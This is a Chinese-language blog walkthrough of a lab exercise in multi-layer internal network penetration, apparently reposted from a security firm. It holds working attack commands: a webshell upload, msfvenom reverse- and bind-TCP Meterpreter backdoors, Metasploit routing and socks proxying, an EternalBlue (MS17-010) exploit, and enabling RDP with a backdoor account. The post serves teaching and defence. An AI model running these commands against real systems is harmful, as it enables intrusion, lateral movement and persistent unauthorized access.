百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

bigegpt 2024-08-02 11:06 12 浏览

内网

    • 前言
    • 1.实验简介
      • 网络拓扑图
    • 2.环境搭建
      • 第一层网络
      • 第二层网络
      • 第三层网络
    • 最后
      • 第一台Linux
      • 第二台Linux
    • 3.实验过程
      • 第一层靶机
      • 蚁剑连接
      • 进一步做内网渗透,上传msf后门
      • 生成一个名为mshell.elf的msf后门文件
      • 蚁剑把后门文件上传到Linux靶机
      • 返回msf 开启监听
      • Kail接受到MSF会话
      • 添加路由
      • 使用MSF建立socks代理
      • 第二层网络
    • 第三层网络
      • 添加路由
      • Win10远程桌面连接
      • 登陆成功

前言


近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

没有耐心看完的看这里:

网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习


需要的关注我:私信回复“资料”获取更多渗透测试、网络安全资料

1.实验简介

网络拓扑图

渗透机:win10+kali

第一层靶机 (外网web服务器): Linux

第二场靶机 (内网web服务器): Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解MSF、内网转发等。

2.环境搭建

第一层网络

把渗透机kali和win10网卡1设置选择VMnet1:


靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:

第二层网络

将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:

第三层网络

将靶机win7网卡1设置选择VMnet3:

再配置好各台机器对应IP即可。

最后

在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透。

第一台Linux

第二台Linux

3.实验过程

第一层靶机

win10访问http://192.168.85.131/直接上传一句话木马

蚁剑连接


进一步做内网渗透,上传msf后门

打开kali msfconsole 输入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为mshell.elf的msf后门文件

蚁剑把后门文件上传到Linux靶机

返回msf 开启监听

use exploit/multi/handler 使用监听模块
set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行


蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入

chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件

Kail接受到MSF会话

输入ifconfig,发现第二层172.10.10.0/24网段

添加路由

background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表

使用MSF建立socks代理

use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run

配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf

添加socks4 192.168.85.128 10080

这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的。

建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络

第二层网络

nmap探测存在web服务的主机

用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24

扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip

由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描。

脚本探测存活主机

在本地创建一个名为ping.sh的脚本,脚本内容如下:

#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l

Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload

进入shell执行

python -c ‘import pty;pty.spawn(“/bin/bash”)’

创建一个完全交互式shell,后

Chmod 777 ping.sh
./ping.sh

可以看到172.10.10.0/24网段存活56.57两台

知道存活主机ip后就可以继续进入第二层内网主机

渗透机浏览器配置sock4a代理

蚁剑加代理连接

连接 http://172.10.10.56/upload/php1.php

进一步做内网渗透,继续上传msf后门

制作MSF后门

返回kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf后门文件

因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接。
蚁剑上传后门

蚁剑打开虚拟终端执行后门文件


返回会话

输入ifconfig 发现第三层网络的网段10.10.10.0/24

第三层网络

添加路由

background
route add 10.10.10.0/24 2
route print

进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传

探测到第三层网段的存活ip :10.10.10.101

proxychans 启动nmap对10.10.10.101的1-500端口扫描,执行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101

发现445端口开启

尝试使用ms17-010
use windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload windows/x64/meterpreter/bind_tcp
set lport 4466

Run ,存在445漏洞

执行成功,返回会话

开启3389远程桌面

run post/windows/manage/enable_rdp 开启远程桌面
run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户

将3389端口转回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101

Win10远程桌面连接

登陆成功

网络安全是一门大学问,要想理解透彻还得一步一步来,对此,我整理了一份小白走向渗透的知识总结,还有视频素材,可以对比着学习,大家下载就行

关注我、私信回复“资料”获取更多渗透测试、网络安全资料

好了,大概内网渗透流程就是这样子,喜欢本文的转发关注我~

相关推荐

Linux 命令 ncftp(文件传输)——想玩转linux就请一直看下去

我是IT悟道,点击右上方“关注”,每天分享IT、科技、数码方面的干货。Linuxncftp命令Linux命令大全Linuxncftp命令用于传输文件。FTP让用户得以下载存放于服务器主机的文件,...

玩转 Linux 之:磁盘分区、挂载知多少?

今天来聊聊linux下磁盘分区、挂载的问题,篇幅所限,不会聊的太底层,纯当科普!!1、Linux分区简介1.1主分区vs扩展分区硬盘分区表中最多能存储四个分区,但我们实际使用时一般只分为两...

一文带你了解 Linux 文件权限,从基础到高级

在Linux中,每个文件和目录都关联了一组权限,定义了不同用户对其的访问能力。权限分为三类:读取(read,r)、写入(write,w)和执行(execute,x),分别用字母r、w、x...

Linux 使用 socat 让云服务器作为跳板机的方法

概念三台机器:客户端A(192.168.1.11)服务器B(192.168.1.88)跳板机C(192.168.1.32)实现A与B的双向数据传输,本该这样:A<...

Linux启动流程之ROM-CODE(linux启动详解)

1.从哪里开始?下图是AM335X核心板和功能框图:AM335X核心板的存储信息如下:AM335X核心板运行linux系统,在这里提出一个问题:上电后指令从哪里开始执行?DDRorEMMC?2....

「Linux」——select和epoll详解(linux epoll详解)

select和epoll详解select和epoll的区别(面试常考)select一、什么是select1.select函数原型2.参数解释3.参数timeout取值4.返回值5.监控原理二、sele...

Linux中使用输入输出和错误重定向, 赶紧收藏!

Linux中的每个进程都提供三个打开的文件(通常称为文件描述符),分别是标准的输入、输出和错误文件。StandardInput是键盘,抽象为文件,使编写脚本和程序更容易。StandardOut...

「正点原子Linux连载」第七十一章Linux 4G通信实验

1)实验平台:正点原子Linux开发板2)摘自《正点原子I.MX6U嵌入式Linux驱动开发指南》关注官方微信号公众号,获取更多资料:正点原子第七十一章Linux4G通信实验前面我们学习了如何在Li...

LSM Oops 内存错误根因分析与解决

作者简介:吴文涵,图形算法出身,同时热爱linux内核开发的工程师,喜欢推导并乐于分享。版权声明:本文最先发表于“泰晓科技”微信公众号,欢迎转载,转载时请在文章的开头保留本声明。Oops是...

连你家电器的算力都不放过,新发现Linux恶意软件用IoT设备挖矿

萧箫发自凹非寺量子位|公众号QbitAI继电脑和手机后,挖矿病毒也盯上了IoT设备。无论是智能冰箱、彩电还是洗衣机,但凡有点算力的(物联网和端侧)设备都可能被这种病毒感染,用于挖掘加密货币等...

Linux-AT命令干货分享,还不赶紧收藏!

苹果iOS 26锁屏大升级:更个性更沉浸 有五大亮点

【CNMO科技消息】CNMO注意到,苹果近日在iOS26开发者预览版中推出了多项锁屏界面创新功能,可以大幅提升用户个性化设置与操作便捷性。这些更新不仅优化了视觉体验,还通过技术手段增强了交互效率,为...

福彩 3D 第 2025178 期:心水407 !大小奇偶双平衡 + 跨度适配,速收藏

福彩3D第2025178期:497后和值回落!五维分析+形态调整策略福彩3D2025177期开奖号码497,组六形态,大小比2:1,奇偶比1:2,和值20,跨度5。面对大...

一加 Ace5 至尊版手机首发适配和平精英手游

7月8日消息,据用户反馈,一加Ace5至尊版手机开启新版本系统推送,升级包大小约6.83MB、版本号为15.0.2.215(CN01),适配了腾讯《和平精英》手游144Hz高刷。IT...

外媒称苹果今年秋季将推出超15款新品 远不止iPhone 17

【CNMO科技消息】2025年已过半程,有外媒指出苹果计划在今年秋季推出超过15款新产品,涵盖iPhone革新、M5芯片设备迭代、可穿戴设备升级及智能家居布局等。苹果1.iPhone17系列:产品...